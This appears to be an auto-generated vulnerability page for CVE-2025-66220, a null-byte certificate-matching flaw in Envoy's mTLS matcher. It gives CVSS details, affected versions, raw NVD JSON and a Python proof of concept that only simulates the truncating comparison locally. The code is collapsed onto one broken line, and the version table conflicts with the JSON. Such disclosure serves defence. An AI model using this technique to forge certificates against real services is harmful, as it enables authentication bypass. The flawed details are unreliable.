Security Vulnerability Report
中文
CVE-2025-66220 CVSS 5.0 MEDIUM

CVE-2025-66220

Published: 2025-12-03 19:15:58
Last Modified: 2025-12-05 15:44:27
Source: [email protected]

Description

Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, Envoy’s mTLS certificate matcher for match_typed_subject_alt_names may incorrectly treat certificates containing an embedded null byte (\0) inside an OTHERNAME SAN value as valid matches.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* - VULNERABLE
Envoy < 1.33.12
Envoy < 1.34.10
Envoy < 1.35.6
Envoy < 1.36.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66220 PoC - Envoy mTLS OTHE RNAME空字节注入漏洞演示 # This PoC demonstrates the concept of embedding null bytes in OTHE RNAME SAN values from cryptography import x509 from cryptography.hazmat.primitives import hashes from cryptography.hazmat.backends import default_backend import binascii def create_malicious_cert_with_null_byte(): """ Create a certificate with embedded null byte in OTHE RNAME SAN value. This PoC demonstrates the vulnerability where Envoy may incorrectly treat certificates with embedded null bytes as valid matches. """ # OTHE RNAME with embedded null byte # The null byte can cause string termination issues in C++ parsing normal_name = b"legitimate-service.example.com" malicious_name = b"legitimate-service.example.com\x00attacker-controlled.com" print("[*] Demonstrating OTHE RNAME SAN null byte injection vulnerability") print(f"[+] Normal SAN value: {normal_name.decode()}") print(f"[+] Malicious SAN value (hex): {binascii.hexlify(malicious_name)}") print(f"[+] Malicious SAN value (with null): {malicious_name.decode('utf-8', errors='ignore')}") print("\n[*] The embedded null byte (\\x00) may cause:") print(" - String truncation during certificate parsing") print(" - Incorrect certificate matching in Envoy's mTLS matcher") print(" - Bypass of certificate validation checks") # Simulate certificate matching behavior def envoy_cert_match(cert_san, expected_san): """ Simplified simulation of Envoy's certificate matching logic Vulnerable implementation may not handle null bytes correctly """ # Vulnerable: Uses C-string style comparison cert_san_truncated = cert_san.split(b'\x00')[0] return cert_san_truncated == expected_san expected = b"legitimate-service.example.com" result = envoy_cert_match(malicious_name, expected) print(f"\n[*] Certificate matching result: {result}") if result: print("[!] VULNERABLE: Malicious certificate matched as valid!") else: print("[+] SAFE: Malicious certificate correctly rejected") return malicious_name # Usage example if __name__ == "__main__": create_malicious_cert_with_null_byte()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66220", "sourceIdentifier": "[email protected]", "published": "2025-12-03T19:15:58.010", "lastModified": "2025-12-05T15:44:26.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, Envoy’s mTLS certificate matcher for match_typed_subject_alt_names may incorrectly treat certificates containing an embedded null byte (\\0) inside an OTHERNAME SAN value as valid matches."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.7, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-170"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.33.13", "matchCriteriaId": "B303FFFE-9973-4E7E-8A8C-DE847B725534"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.34.0", "versionEndExcluding": "1.34.11", "matchCriteriaId": "4419A82D-995F-4DD0-BAE1-3825791245D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.35.0", "versionEndExcluding": "1.35.7", "matchCriteriaId": "C50E067C-AE0D-4B14-A442-53603039EFCD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.36.0", "versionEndExcluding": "1.36.3", "matchCriteriaId": "B39C3DF2-E73F-4B66-9504-C24E329ACB54"}]}]}], "references": [{"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-rwjg-c3h2-f57p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.